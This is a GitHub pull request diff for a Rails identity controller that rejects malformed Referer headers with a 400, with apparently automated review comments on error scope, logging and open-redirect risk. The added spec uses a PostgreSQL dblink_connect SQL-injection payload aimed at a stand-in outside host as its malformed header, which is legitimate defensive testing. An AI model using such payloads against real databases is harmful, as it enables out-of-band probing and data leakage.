Merge pull request #28 from 18F/jgs/lg-690-handle-bad-referrer-error
[LG-690] Handle bad referrer
jgsmith-usds authored Oct 1, 2018
2 parents 098c136 + 0485b1b commit b3297a0
Showing 2 changed files with 26 additions and 4 deletions.
16 changes: 12 additions & 4 deletions app/controllers/identify_controller.rb
Expand Up @@ -6,6 +6,8 @@ class IdentifyController < ApplicationController
CERT_HEADER = 'X-Client-Cert'.freeze
REFERER_HEADER = 'Referer'.freeze

delegate :logger, to: Rails

def create
if referrer
# given a valid certificate from the client, return a token
Expand All @@ -14,20 +16,26 @@ def create
# redirect to referer OR redirect to a preconfigured URL template
redirect_to referrer.to_s
else
Rails.logger.warn('No referrer, returning Bad Request.')
render plain: 'Invalid request', status: :bad_request
render_bad_request('No referrer')
end
rescue URI::InvalidURIError
render_bad_request('Bad referrer')
end

private

def render_bad_request(reason)
logger.warn("#{reason}, returning Bad Request.")
render plain: 'Invalid request', status: :bad_request
end

# :reek:UtilityFunction
def token_for_referrer
cert_pem = client_cert
token = if cert_pem
process_cert(cert_pem)
else
Rails.logger.warn('No certificate found in headers.')
logger.warn('No certificate found in headers.')
TokenService.box(error: 'certificate.none', nonce: nonce)
end
CGI.escape(token)
Expand All @@ -49,7 +57,7 @@ def process_cert(raw_cert)

cert.token(nonce: nonce)
rescue OpenSSL::X509::CertificateError => error
Rails.logger.warn("CertificateError: #{error.message}")
logger.warn("CertificateError: #{error.message}")
TokenService.box(error: 'certificate.bad', nonce: nonce)
end

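Review bot: The `rescue URI::InvalidURIError` added at the end of `create` is method-scoped, so it catches that error wherever it is raised in the body — inside `token_for_referrer`/`process_cert` or `redirect_to` just as much as in the Referer parse — and always logs it as 'Bad referrer'; `referrer` itself is defined outside the hunk, so I am inferring that is where the parse happens. To keep the log reason accurate, either have `referrer` return nil on a parse failure so the existing `render_bad_request('No referrer')` branch handles it, or wrap only the parse. If `referrer` does more than `URI.parse` (builds or compares components), `URI::InvalidComponentError` would still escape, so `rescue URI::Error` in place of `rescue URI::InvalidURIError` is the safer catch-all. Separately, `redirect_to referrer.to_s` is only as safe as the host check inside `referrer`; the spec stubbing `identity_idp_host` suggests the target is restricted to the configured IdP, but this line becomes an open redirect if that check is ever relaxed.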
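--- a/spec/controllers/identify_controller_spec.rb
+++ b/spec/controllers/identify_controller_spec.rb
@@ -28,6 +28,20 @@
 end
 end
 
+describe 'with a malformed referrer' do
+before(:each) do
+allow(Figaro.env).to receive(:identity_idp_host).and_return('example.org')
+@request.headers['Referer'] =
+"cast((SELECT dblink_connect('host=xyz'|" \
+"|'123.example.com user=a password=a connect_timeout=2')) as numeric)"
+end
+
+it 'returns http bad request' do
+get :create, params: { nonce: '123' }
+expect(response).to have_http_status(:bad_request)
+end
+end
+
 describe 'with a good referrer' do
 before(:each) do
 allow(Figaro.env).to receive(:identity_idp_host).and_return('example.com')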
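Review bot: The new 'with a malformed referrer' example only checks the status code, so nothing pins that the attacker-controlled Referer value is not reflected in the response. Since the header here is deliberately a hostile string, add a body assertion next to the status check, `expect(response.body).to eq('Invalid request')`, so a later change that echoes the rejected header back would fail the spec. A short comment on the `@request.headers['Referer'] =` line, `# not a parseable URI; URI.parse raises URI::InvalidURIError`, would also make clear which error path this example exercises.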
